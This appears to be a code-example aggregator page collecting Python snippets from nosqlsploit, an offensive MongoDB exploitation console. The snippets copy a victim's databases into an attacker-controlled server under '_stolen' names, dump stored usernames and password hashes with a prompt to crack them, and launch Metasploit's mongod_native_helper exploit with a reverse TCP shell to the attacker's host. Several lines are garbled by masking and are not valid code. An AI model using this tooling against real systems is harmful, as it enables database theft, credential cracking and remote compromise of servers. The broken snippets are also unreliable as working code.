コード例 #1
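 def setParam(self ,param ,value):
     '''Store value in the module-level global named by param (upper-cased).

     The assignment goes straight into the module namespace. The earlier
     version formatted param and value into a source string and exec()'d
     it, so a quote, backslash or newline in either one was interpreted as
     Python instead of being stored as data.
     '''
     param = param.upper()
     pp.prettyPrint("[*] SET %s=>%s"%(param ,value) ,YELLOW)
     # "%s" keeps the old contract that the stored option is always text.
     globals()[param] = "%s" % (value ,)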
コード例 #2
ファイル: pluginModule.py プロジェクト: daige/nosqlsploit
 def exploit(self):
     """Rebind exploitModule to the result of calling it, then run the plugin.

     Any exception raised while calling exploitModule() is ignored, so
     plugin.exploit() is invoked whether or not the rebinding succeeded.
     """
     global exploitModule
     try:
         exploitModule = exploitModule()
     except:
         # Failure to instantiate is swallowed; the name keeps its old value.
         pass
     pp.prettyPrint("[*] Start exploit.." ,YELLOW)
     plugin.exploit()
コード例 #3
 def exploit(self):
     """Call exploitModule() and store the result under the same global name,
     then announce the run and delegate to plugin.exploit().

     Errors from the exploitModule() call are ignored.
     """
     global exploitModule
     try:
         exploitModule = exploitModule()
     except:
         # Swallowed on purpose of flow: plugin.exploit() still runs below.
         pass
     pp.prettyPrint("[*] Start exploit.." ,YELLOW)
     plugin.exploit()
コード例 #4
 def do_set(self,arg):
     """Handle ``set <PARAM> <VALUE>``.

     The argument must split on single spaces into exactly two tokens,
     otherwise the usage line is printed. When both tokens are non-empty the
     parameter name is checked with pluginModule.checkParam() and, if
     accepted, handed to pluginModule.setParam(); the value itself is not
     inspected here.
     """
     tokens = arg.split(" ")
     if len(tokens) != 2:
         pp.prettyPrint("[?] USAGE:set <PARAM> <VALUE>" ,YELLOW)
         return
     param, value = tokens
     if not (len(param) and len(value)):
         # An empty name or value is dropped without any message.
         return
     if self.pluginModule.checkParam(param):
         self.pluginModule.setParam(param ,value)
     else:
         pp.prettyPrint("[!] ERR:invalid set param" ,YELLOW)
コード例 #5
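 def msfLaunch(self, RHOST, LHOST, LPORT):
     '''Run msfcli with the fixed module and payload below, filling in
     RHOST, LHOST and LPORT.

     The command is passed as an argument list with no shell in between.
     The earlier version concatenated the three values into one string and
     ran it with shell=True, so any shell metacharacter in an option value
     was interpreted by the shell.
     '''
     argv = [
         "msfcli",
         "exploit/linux/misc/mongod_native_helper",
         "RHOST=" + str(RHOST),
         "DB=local",
         "PAYLOAD=linux/x86/shell/reverse_tcp",
         "LHOST=" + str(LHOST),
         "LPORT=" + str(LPORT),
         "E",
     ]
     try:
         subprocess.call(argv)
     except:
         # Without a shell, a missing msfcli binary raises here (OSError),
         # which is the case the message below describes.
         pp.prettyPrint(
             "Something went wrong.  Make sure Metasploit is installed and path is set, and all options are defined.",
             RED)
         return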
コード例 #6
 def enumGrid (self,mongoConn):
     """Print the GridFS file listing of every database on mongoConn.

     Each database is probed on its own: any exception while opening or
     listing GridFS is reported as "not enabled" for that database. A
     failure to obtain the database names is reported once.
     """
     try:
         for name in mongoConn.database_names():
             try:
                 bucket = gridfs.GridFS(mongoConn[name])
                 listing = bucket.list()
                 pp.prettyPrint("GridFS enabled on database " + str(name),GREEN)
                 pp.prettyPrint(" list of files:",GREEN)
                 pp.prettyPrint("\n".join(listing),PURPLE)
             except:
                 pp.prettyPrint("GridFS not enabled on " + str(name) + ".",RED)
     except:
         pp.prettyPrint("[!]Error:  Couldn't enumerate GridFS.  The provided credentials may not have rights.",RED)
     return
コード例 #7
 def getPlatInfo(self, mongoConn):
     """Print the 'version', 'debug' and 'bits' fields of mongoConn.server_info().

     server_info() is queried once per field, in that order.
     """
     pp.prettyPrint("Mongodb Server Basic Info", GREEN)
     version_line = "MongoDB Version: " + mongoConn.server_info()['version']
     pp.prettyPrint(version_line, PURPLE)
     debug_line = "Debugs enabled : " + str(mongoConn.server_info()['debug'])
     pp.prettyPrint(debug_line, PURPLE)
     bits_line = "Platform: " + str(mongoConn.server_info()['bits']) + " bit"
     pp.prettyPrint(bits_line, PURPLE)
     return
コード例 #8
 def enumGrid(self, mongoConn):
     """List GridFS files for each database reachable through mongoConn.

     A per-database failure prints the "not enabled" line and the loop
     continues; a failure outside the per-database step prints a single
     enumeration error.
     """
     try:
         for name in mongoConn.database_names():
             try:
                 bucket = gridfs.GridFS(mongoConn[name])
                 listing = bucket.list()
                 enabled_line = "GridFS enabled on database " + str(name)
                 pp.prettyPrint(enabled_line, GREEN)
                 pp.prettyPrint(" list of files:", GREEN)
                 pp.prettyPrint("\n".join(listing), PURPLE)
             except:
                 disabled_line = "GridFS not enabled on " + str(name) + "."
                 pp.prettyPrint(disabled_line, RED)
     except:
         pp.prettyPrint(
             "[!]Error:  Couldn't enumerate GridFS.  The provided credentials may not have rights.",
             RED)
     return
コード例 #9
ファイル: pluginModule.py プロジェクト: daige/nosqlsploit
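 def setParam(self ,param ,value):
     '''Store a plugin option in the module-level global named by param.

     param is upper-cased first. PAYLOAD is special-cased:
       * a value of "false" (any case) stores the string "false";
       * otherwise the value is stored only when checkPayload(value) returns
         'TRUE' and getOption("PAYLOAD") is not "FALSE";
       * anything else prints the failure line and stores nothing.
     Every other parameter is stored as given.

     Assignments go straight into the module namespace. The earlier version
     formatted param and value into a source string and exec()'d it, so a
     quote, backslash or newline in either one was interpreted as Python
     instead of being stored as data.
     '''
     param = param.upper()
     if param == 'PAYLOAD':
         if value.upper() == "FALSE":
             globals()['PAYLOAD'] = "false"
             pp.prettyPrint("[*] Disabled PAYLOAD !" ,YELLOW)
         elif self.checkPayload(value) == 'TRUE' and self.getOption("PAYLOAD") != "FALSE":
             pp.prettyPrint("[*] SET PAYLOAD=>%s"%value ,YELLOW)
             globals()['PAYLOAD'] = "%s" % (value ,)
         else:
             pp.prettyPrint("[!] SET PAYLOAD FALSE !" ,RED)
     else:
         pp.prettyPrint("[*] SET %s=>%s"%(param ,value) ,YELLOW)
         # "%s" keeps the old contract that the stored option is always text.
         globals()[param] = "%s" % (value ,)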
コード例 #10
 def errmsg(self,msg):
     """Print msg in RED behind the "[!] Err:" prefix."""
     line = "[!] Err:%s"%msg
     pp.prettyPrint(line,RED)
コード例 #11
 def mainExit(self):
     """Print the farewell line in RED and terminate with exit status 0."""
     farewell = "\nBye "
     pp.prettyPrint(farewell,RED)
     exit(0)
コード例 #12
 def printLogo(self):
     """Print self.logo in GREY, passing 0 as prettyPrint's third argument."""
     banner = self.logo
     pp.prettyPrint(banner,GREY,0)
コード例 #13
 def exeCMD(self,cmd):
     """Echo cmd to the console in RED, then pass it to system()."""
     notice = '[*] EXEC:%s'%cmd
     pp.prettyPrint(notice,RED)
     # cmd reaches system() exactly as received; nothing in this method
     # filters or quotes it.
     system(cmd)
コード例 #14
 def stealDBs(self,LHOST,LPORT,RHOST,mongoConn):
     '''Interactively copy one database from RHOST into the MongoDB at LHOST:LPORT.

     Prints a numbered menu built from mongoConn.database_names(), reads a
     selection, and calls copy_database() on a MongoClient for LHOST:LPORT
     with RHOST as the source host. The copy is named "<db>_stolen".
     '''
     victim = RHOST
     localDbIp = LHOST
     localDbPort = int(LPORT)
     dbList = mongoConn.database_names()
     menuItem = 1
     # Nothing to choose from: report and stop.
     if len(dbList) == 0:
         pp.prettyPrint("Can't get a list of databases to steal.  The provided credentials may not have rights.",YELLOW)
         return
     
     # Menu entries are numbered from 1.
     for dbName in dbList:
         pp.prettyPrint(str(menuItem) + "-" + dbName,GREEN)
         menuItem += 1
     
     try:
         dbLoot = raw_input("Select a database to steal:")
     except:
         pp.prettyPrint("[!]Invalid selection.",RED)
         # NOTE(review): bare stealDBs and myDB are not defined in this
         # excerpt, and two arguments are passed where the signature takes
         # four. dbLoot also stays unbound after this branch.
         stealDBs(myDB,mongoConn)
         
     try:
         #Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
         dbNeedCreds = raw_input("Does this database require credentials (y/n)? ")
         if dbNeedCreds.lower() == "n":
             myDBConn = pymongo.MongoClient(localDbIp,localDbPort)
             # NOTE(review): int(dbLoot)-1 is used as an index with no range
             # check; "0" selects dbList[-1], and non-numeric input raises
             # into the except below.
             myDBConn.copy_database(dbList[int(dbLoot)-1],dbList[int(dbLoot)-1] + "_stolen",victim)	
         elif dbNeedCreds.lower() == "y":
             # NOTE(review): the next line is garbled on this page (runs of
             # "******" replaced part of the statement) and is not valid
             # Python as shown; the original text cannot be recovered here.
             dbUser = raw_input("Enter database username: "******"Enter database password: "******"_stolen",victim,dbUser,dbPass)
         else:
             pp.prettyPrint("[!]Invalid Selection.  Press enter to continue.",RED)
             stealDBs(myDB,mongoConn)
             
         cloneAnother = raw_input("Database cloned.  Copy another (y/n)? ")
         if cloneAnother.lower() == "y":
             self.stealDBs(myDB,mongoConn)
         else:
             return
     except:
         # The failure is classified by searching the exception text.
         if str(sys.exc_info()).find('text search not enabled') != -1:
             pp.prettyPrint("Database copied, but text indexing was not enabled on the target.  Indexes not moved.",GREEN)
             return
         else:	
             pp.prettyPrint("[!]Something went wrong.  Are you sure your MongoDB is running and options are set?",RED)
             return
コード例 #15
ファイル: tools.py プロジェクト: daige/nosqlsploit
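    def mainHelp(self):
        '''Print the NSS main help menu followed by the "show" sub-menu.

        The second menu text previously contained unresolved merge-conflict
        markers (<<<<<<< / ======= / >>>>>>>) inside the string literal, so
        they were printed to the user. The conflict is resolved by keeping
        the incoming "multi" entry; the HEAD side was empty.
        '''
        pp.prettyPrint('NSS HELP MENU',YELLOW)
        pp.prettyPrint('=============',GREY)
        pp.prettyPrint('        COMMAND         DESCRIPTION',YELLOW)
        pp.prettyPrint('        -------         -----------',GREY,0)
        pp.prettyPrint('''
        help            Displays the help menu
        exit            Exit the NSS
        cls             Clear the screen
        show            List the plugins
        search          Search plugins
        use             Use the plugin''',CYAN)
        pp.prettyPrint('NSS HELP::SHOW',YELLOW)
        pp.prettyPrint('==============',GREY)
        pp.prettyPrint('        COMMAND         DESCRIPTION',YELLOW)
        pp.prettyPrint('        -------         -----------',GREY,0)
        # NOTE(review): the "multi" description repeats the "mongodb" one
        # verbatim, as it did in the incoming side of the conflict; confirm
        # the intended wording.
        pp.prettyPrint('''
        mongodb         List the mongodb plugins
        multi           List the mongodb plugins
        all             List all the plugins''',CYAN)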
コード例 #16
 def showOptions(self):
     """Print the plugin option table: one row per entry of plugin.opts.

     Each entry supplies the parameter name, its value and a description at
     indexes 0, 1 and 2.
     """
     row_fmt = "        %-15s %-20s %-40s"
     pp.prettyPrint("\n",GREY)
     pp.prettyPrint("    PLUGIN OPTS" ,YELLOW)
     pp.prettyPrint("    ===========" ,GREY)
     pp.prettyPrint(row_fmt%("PARAMETER" ,"VALUE" ,"DESCRIPTION") ,YELLOW)
     pp.prettyPrint(row_fmt%("-"*15 ,"-"*20 ,"-"*40) ,GREY)
     for entry in plugin.opts:
         name, current, text = entry[0], entry[1], entry[2]
         # The first two cells pass 0 as the third prettyPrint argument.
         pp.prettyPrint("        %-15s"%name ,CYAN ,0)
         pp.prettyPrint("%-20s"%current, PURPLE, 0)
         pp.prettyPrint("%-20s"%text , GREEN)
     pp.prettyPrint("\n",GREY)
コード例 #17
 def showUsage(tips):
     """Print tips in YELLOW behind the "[?] USAGE:" prefix."""
     line = '[?] USAGE:%s'%tips
     pp.prettyPrint(line,YELLOW)
コード例 #18
ファイル: pluginModule.py プロジェクト: daige/nosqlsploit
 def showOptions(self):
     '''Print the plugin option table and, when a payload is selected, the
     payload's option table.

     Option values are not taken from plugin.opts: each one is read from the
     variable whose name is the option's parameter name.
     '''
     pp.prettyPrint("PLUGIN OPTS" ,YELLOW)
     pp.prettyPrint("===========" ,GREY)
     pp.prettyPrint("%-15s %-20s %-40s"%("PARAMETER" ,"VALUE" ,"DESCRIPTION") ,YELLOW)
     pp.prettyPrint("%-15s %-20s %-40s"%("-"*15 ,"-"*20 ,"-"*40) ,GREY)
     for opt in plugin.opts:
         param = opt[0]
         value = opt[1]
         desc = opt[2]
         pp.prettyPrint("%-15s"%param ,CYAN ,0)
         # Splices param into a source string so the variable of that name is
         # evaluated and printed.
         # NOTE(review): exec() on text assembled from plugin data; a plain
         # namespace lookup would read the value without evaluating code.
         exec('pp.prettyPrint("%-20s"%' + "%s"%param + ', PURPLE, 0)')
         pp.prettyPrint("%-40s"%desc ,GREEN)
     if self.checkPayload(PAYLOAD) == "TRUE":
         pp.prettyPrint("PAYLOAD OPTS" ,YELLOW)
         pp.prettyPrint("============" ,GREY)
         pp.prettyPrint("%-15s %-40s"%("PARAMETER" ,"DESCRIPTION") ,YELLOW)
         pp.prettyPrint("%-15s %-40s"%("-"*15 ,"-"*40) ,GREY)
         # Reads plugins/payload/<PAYLOAD>.py and executes its source here.
         # NOTE(review): the path is built by concatenating PAYLOAD with no
         # normalisation; the only gate visible in this block is the
         # checkPayload() test above. The file object is never closed
         # explicitly.
         code = open("plugins/payload/" + PAYLOAD + ".py").read()
         exec(code)
         try:
             # NOTE(review): a global statement inside its own exec() applies
             # only to that exec'd snippet; presumably this has no effect on
             # the loop below (confirm).
             exec("global NSSPayload")
         except:
             pass
         # NSSPayload is expected to come from the payload file executed above.
         for opt in NSSPayload.opts:
             param = opt[0]
             desc = opt[1]
             pp.prettyPrint("%-15s"%param ,CYAN ,0)
             pp.prettyPrint("%-40s"%desc ,PURPLE)
コード例 #19
    def enumDbs(self, mongoConn):
        """Print database names, then each database's collection names.

        Where a database has a 'system.users' collection, its documents are
        read and the user entries are printed, with a prompt that can hand
        the 'user' and 'pwd' fields to self.passCrack().
        """
        try:
            pp.prettyPrint("List of databases:", GREEN)
            pp.prettyPrint("\n".join(mongoConn.database_names()), PURPLE)
        except:
            # Reported but not fatal: execution continues with the collection
            # listing, which calls database_names() again.
            pp.prettyPrint(
                "[!]Error:  Couldn't list databases.  The provided credentials may not have rights.",
                RED)

        pp.prettyPrint("List of collections:", GREEN)
        try:
            for dbItem in mongoConn.database_names():
                db = mongoConn[dbItem]
                pp.prettyPrint(dbItem + ":", CYAN)
                pp.prettyPrint("\n".join(db.collection_names()), PURPLE)
                if 'system.users' in db.collection_names():
                    users = list(db.system.users.find())
                    pp.prettyPrint("Database Users and Password Hashes:",
                                   GREEN)
                    for x in range(0, len(users)):
                        # NOTE(review): the next line is garbled on this page
                        # (a run of "******" replaced part of the statement)
                        # and is not valid Python as shown.
                        pp.prettyPrint("Username: "******"Hash: " + users[x]['pwd'], GREEN)
                        pp.prettyPrint("\n", GREEN)
                        crack = raw_input("Crack this hash (y/n)? ")
                        if crack.lower() == "y":
                            self.passCrack(users[x]['user'], users[x]['pwd'])
        except:
            # Any failure inside the loop, including in the prompt or in
            # passCrack(), ends the whole listing with this one message.
            pp.prettyPrint(
                "[!]Error:  Couldn't list collections.  The provided credentials may not have rights.",
                RED)
            return
コード例 #20
ファイル: pluginModule.py プロジェクト: daige/nosqlsploit
 def info(self):
     """Print the plugin info table: one name/value row per entry of plugin.infos."""
     heading = (
         ("PLUGIN INFOS" ,YELLOW),
         ("============" ,GREY),
         ("PARAMETER       VALUE" ,YELLOW),
         ("-"*15 + " " + "-"*20 ,GREY),
     )
     for text, colour in heading:
         pp.prettyPrint(text ,colour)
     for entry in plugin.infos:
         name, content = entry[0], entry[1]
         # The name cell passes 0 as the third prettyPrint argument.
         pp.prettyPrint("%-15s"%name ,CYAN ,0)
         pp.prettyPrint("%-s"%content ,PURPLE)
コード例 #21
ファイル: pluginModule.py プロジェクト: daige/nosqlsploit
 def pluginHelp(self):
     """Print the plugin-console help: the command list, then the ``set`` targets."""
     commands = '''
     help            Displays the plugin menu
     exit            Back to NSS Main
     cls             Clear the screen
     info            Displays the plugin info
     show            Displays the plugin options
     set             Configure the plugin parameters
     exploit         Start plugin to exploit'''
     set_targets = '''
     PAYLOAD         Set payload
     <PARAMETER>     Set parameter'''
     column_head = '        Command         Description'
     column_rule = '        -------         -----------'
     # One argument tuple per prettyPrint call, in display order.
     screen = (
         ('PLUGIN HELP MENU' ,YELLOW),
         ('================' ,GREY),
         (column_head ,YELLOW),
         (column_rule ,GREY ,0),
         (commands ,CYAN),
         ('PLUGIN SET HELP' ,YELLOW),
         ('===============' ,GREY),
         (column_head ,YELLOW),
         (column_rule ,GREY ,0),
         (set_targets ,CYAN),
     )
     for call_args in screen:
         pp.prettyPrint(*call_args)
コード例 #22
ファイル: loadModule.py プロジェクト: daige/nosqlsploit
 def loadError(self,flag):
     """Print one of two load failures in RED: unknown plugin when flag is
     truthy, "it's a payload" otherwise."""
     message = "[!] NO THIS PLUGIN !" if flag else "[!] IT'S A PAYLOAD !"
     pp.prettyPrint(message,RED)
コード例 #23
 def start(self):
     """Print the start-up line in GREEN."""
     greeting = "[*] Start NSS .."
     pp.prettyPrint(greeting,GREEN)
コード例 #24
    def stealDBs(self, LHOST, LPORT, RHOST, mongoConn):
        """Interactively copy one database from RHOST into the MongoDB at LHOST:LPORT.

        Prints a numbered menu built from mongoConn.database_names(), reads a
        selection, and calls copy_database() on a MongoClient for LHOST:LPORT
        with RHOST as the source host. The copy is named "<db>_stolen".
        """
        victim = RHOST
        localDbIp = LHOST
        localDbPort = int(LPORT)
        dbList = mongoConn.database_names()
        menuItem = 1
        # Nothing to choose from: report and stop.
        if len(dbList) == 0:
            pp.prettyPrint(
                "Can't get a list of databases to steal.  The provided credentials may not have rights.",
                YELLOW)
            return

        # Menu entries are numbered from 1.
        for dbName in dbList:
            pp.prettyPrint(str(menuItem) + "-" + dbName, GREEN)
            menuItem += 1

        try:
            dbLoot = raw_input("Select a database to steal:")
        except:
            pp.prettyPrint("[!]Invalid selection.", RED)
            # NOTE(review): bare stealDBs and myDB are not defined in this
            # excerpt, and two arguments are passed where the signature takes
            # four. dbLoot also stays unbound after this branch.
            stealDBs(myDB, mongoConn)

        try:
            #Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
            dbNeedCreds = raw_input(
                "Does this database require credentials (y/n)? ")
            if dbNeedCreds.lower() == "n":
                myDBConn = pymongo.MongoClient(localDbIp, localDbPort)
                # NOTE(review): int(dbLoot) - 1 is used as an index with no
                # range check; "0" selects dbList[-1], and non-numeric input
                # raises into the except below.
                myDBConn.copy_database(dbList[int(dbLoot) - 1],
                                       dbList[int(dbLoot) - 1] + "_stolen",
                                       victim)
            elif dbNeedCreds.lower() == "y":
                # NOTE(review): the next statement is garbled on this page
                # (runs of "******" replaced part of it) and is not valid
                # Python as shown; the original text cannot be recovered here.
                dbUser = raw_input("Enter database username: "******"Enter database password: "******"_stolen",
                                       victim, dbUser, dbPass)
            else:
                pp.prettyPrint(
                    "[!]Invalid Selection.  Press enter to continue.", RED)
                stealDBs(myDB, mongoConn)

            cloneAnother = raw_input("Database cloned.  Copy another (y/n)? ")
            if cloneAnother.lower() == "y":
                self.stealDBs(myDB, mongoConn)
            else:
                return
        except:
            # The failure is classified by searching the exception text.
            if str(sys.exc_info()).find('text search not enabled') != -1:
                pp.prettyPrint(
                    "Database copied, but text indexing was not enabled on the target.  Indexes not moved.",
                    GREEN)
                return
            else:
                pp.prettyPrint(
                    "[!]Something went wrong.  Are you sure your MongoDB is running and options are set?",
                    RED)
                return
コード例 #25
 def mainHelp(self):
     """Print the NSS main help menu, framed by a blank line before and after."""
     commands = '''
     help            Displays the help menu
     show            List the plugins
     search          Search plugins
     use             Use the plugin
     banner          Show the banner
     cls             Clear the screen
     exit            Exit the NSS'''
     # One argument tuple per prettyPrint call, in display order.
     screen = (
         ("\n",GREY),
         ('    NSS HELP MENU',YELLOW),
         ('    =============',GREY),
         ('        COMMAND         DESCRIPTION',YELLOW),
         ('        -------         -----------',GREY,0),
         (commands,CYAN),
         ("\n",GREY),
     )
     for call_args in screen:
         pp.prettyPrint(*call_args)
コード例 #26
    def enumDbs (self,mongoConn):
        """Print database names, then each database's collection names.

        Where a database has a 'system.users' collection, its documents are
        read and the user entries are printed, with a prompt that can hand
        the 'user' and 'pwd' fields to self.passCrack().
        """
        try:
            pp.prettyPrint("List of databases:",GREEN)
            pp.prettyPrint("\n".join(mongoConn.database_names()),PURPLE)
        except:
            # Reported but not fatal: execution continues with the collection
            # listing, which calls database_names() again.
            pp.prettyPrint("[!]Error:  Couldn't list databases.  The provided credentials may not have rights.",RED)

        pp.prettyPrint("List of collections:",GREEN)
        try:
            for dbItem in mongoConn.database_names():
                db = mongoConn[dbItem]
                pp.prettyPrint(dbItem + ":",CYAN)
                pp.prettyPrint("\n".join(db.collection_names()),PURPLE)
                if 'system.users' in db.collection_names():
                    users = list(db.system.users.find())
                    pp.prettyPrint("Database Users and Password Hashes:",GREEN)
                    for x in range (0,len(users)):
                        # NOTE(review): the next line is garbled on this page
                        # (a run of "******" replaced part of the statement)
                        # and is not valid Python as shown.
                        pp.prettyPrint("Username: "******"Hash: " + users[x]['pwd'],GREEN)
                        pp.prettyPrint("\n",GREEN)
                        crack = raw_input("Crack this hash (y/n)? ")
                        if crack.lower() == "y":
                            self.passCrack(users[x]['user'],users[x]['pwd'])
        except:
            # Any failure inside the loop, including in the prompt or in
            # passCrack(), ends the whole listing with this one message.
            pp.prettyPrint("[!]Error:  Couldn't list collections.  The provided credentials may not have rights.",RED)
            return
コード例 #27
 def loadError(self):
     """Print the unknown-plugin error in RED."""
     message = "[!] NO THIS PLUGIN !"
     pp.prettyPrint(message,RED)
コード例 #28
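 def msfLaunch(self,RHOST,LHOST,LPORT):
     '''Run msfcli with the fixed module and payload below, filling in
     RHOST, LHOST and LPORT.

     The command is passed as an argument list with no shell in between.
     The earlier version concatenated the three values into one string and
     ran it with shell=True, so any shell metacharacter in an option value
     was interpreted by the shell.
     '''
     argv = [
         "msfcli",
         "exploit/linux/misc/mongod_native_helper",
         "RHOST=" + str(RHOST),
         "DB=local",
         "PAYLOAD=linux/x86/shell/reverse_tcp",
         "LHOST=" + str(LHOST),
         "LPORT=" + str(LPORT),
         "E",
     ]
     try:
         subprocess.call(argv)
     except:
         # Without a shell, a missing msfcli binary raises here (OSError),
         # which is the case the message below describes.
         pp.prettyPrint("Something went wrong.  Make sure Metasploit is installed and path is set, and all options are defined.",RED)
         return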
コード例 #29
 def pluginHelp(self):
     """Print the plugin-console help and the ``set`` help, framed by blank lines."""
     commands = '''
     help            Displays the plugin menu
     info            Displays the plugin info
     show            Displays the plugin options
     set             Configure the plugin parameters
     exploit         Exploit the target
     cls             Clear the screen
     back            Back to NSS Main'''
     set_targets = '''
     <PARAMETER>     Set parameter'''
     column_head = '        Command         Description'
     column_rule = '        -------         -----------'
     # One argument tuple per prettyPrint call, in display order.
     screen = (
         ("\n",GREY),
         ('   PLUGIN HELP MENU' ,YELLOW),
         ('   ================' ,GREY),
         (column_head ,YELLOW),
         (column_rule ,GREY ,0),
         (commands ,CYAN),
         ('    PLUGIN SET HELP' ,YELLOW),
         ('    ===============' ,GREY),
         (column_head ,YELLOW),
         (column_rule ,GREY ,0),
         (set_targets ,CYAN),
         ("\n",GREY),
     )
     for call_args in screen:
         pp.prettyPrint(*call_args)
コード例 #30
 def getPlatInfo(self,mongoConn):
     """Print the 'version', 'debug' and 'bits' fields of mongoConn.server_info().

     server_info() is queried once per field, in that order.
     """
     pp.prettyPrint("Mongodb Server Basic Info",GREEN)
     version_line = "MongoDB Version: " + mongoConn.server_info()['version']
     pp.prettyPrint(version_line,PURPLE)
     debug_line = "Debugs enabled : " + str(mongoConn.server_info()['debug'])
     pp.prettyPrint(debug_line,PURPLE)
     bits_line = "Platform: " + str(mongoConn.server_info()['bits']) + " bit"
     pp.prettyPrint(bits_line,PURPLE)
     return
コード例 #31
            if len(param) and len(value):
                res = self.pluginModule.checkParam(param)
                if res:
                    self.pluginModule.setParam(param ,value)
                else:
                    pp.prettyPrint("[!] ERR:invalid set param" ,YELLOW)
        else:
            pp.prettyPrint("[?] USAGE:set <PARAM> <VALUE>" ,YELLOW)

    def complete_set(self,text,line,begidx,endidx):
        """Tab-completion for ``set``: offer the plugin's option names.

        With no text typed, a copy of the full list from
        pluginModule.getOptions() is returned; otherwise only the names that
        start with the upper-cased text. line, begidx and endidx are unused.
        """
        option_names = self.pluginModule.getOptions()
        if text:
            return [name for name in option_names if name.startswith(text.upper())]
        return option_names[:]

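    def do_EOF(self, line=None):
        """Handle end-of-input by returning True.

        ``line`` is accepted and ignored. cmd.Cmd-style dispatch passes the
        rest of the input line to every do_* handler, so the previous
        one-parameter signature would raise TypeError when called that way.
        NOTE(review): the enclosing class is outside this excerpt; it is
        assumed to follow the cmd.Cmd protocol (cmdloop(), do_* and
        complete_* are used nearby). Confirm against the class header.
        """
        return True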

    # Alias: "back" is bound to the same handler object as "exit".
    # do_exit is defined outside this excerpt.
    do_back = do_exit

# Script entry point: build the plugin console and run its command loop.
if __name__ == '__main__':
    try:
        # NOTE(review): arg is not defined anywhere in this excerpt; confirm
        # where it is assigned before this line runs.
        loads = loadPlugin(arg)
        loads.cmdloop()
    except KeyboardInterrupt:
        # Ctrl+C ends the console with a message instead of a traceback.
        pp.prettyPrint("\n[!] CTRL+C EXIT !",RED)
    # Python 2 except syntax; any other error is shown as one line.
    except Exception,e:
        pp.prettyPrint("[!] ERR:%s"%e,RED)
コード例 #32
 def info(self):
     """Print the plugin info table, framed by blank lines: one name/value
     row per entry of plugin.infos."""
     heading = (
         ("\n",GREY),
         ("    PLUGIN INFOS" ,YELLOW),
         ("    ============" ,GREY),
         ("        PARAMETER       VALUE" ,YELLOW),
         ("        "+"-"*15 + " " + "-"*20 ,GREY),
     )
     for text, colour in heading:
         pp.prettyPrint(text ,colour)
     for entry in plugin.infos:
         name, content = entry[0], entry[1]
         # The name cell passes 0 as the third prettyPrint argument.
         pp.prettyPrint("        %-15s"%name ,CYAN ,0)
         pp.prettyPrint("%-s"%content ,PURPLE)
     pp.prettyPrint("\n",GREY)